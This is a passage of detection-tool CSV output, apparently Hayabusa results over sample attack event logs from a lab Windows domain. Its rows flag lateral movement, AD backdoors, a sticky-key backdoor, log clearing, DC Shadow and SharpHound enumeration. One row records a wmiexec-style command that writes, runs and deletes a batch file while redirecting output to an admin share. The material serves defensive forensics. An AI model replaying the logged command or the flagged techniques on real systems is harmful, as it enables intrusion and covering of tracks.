ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: 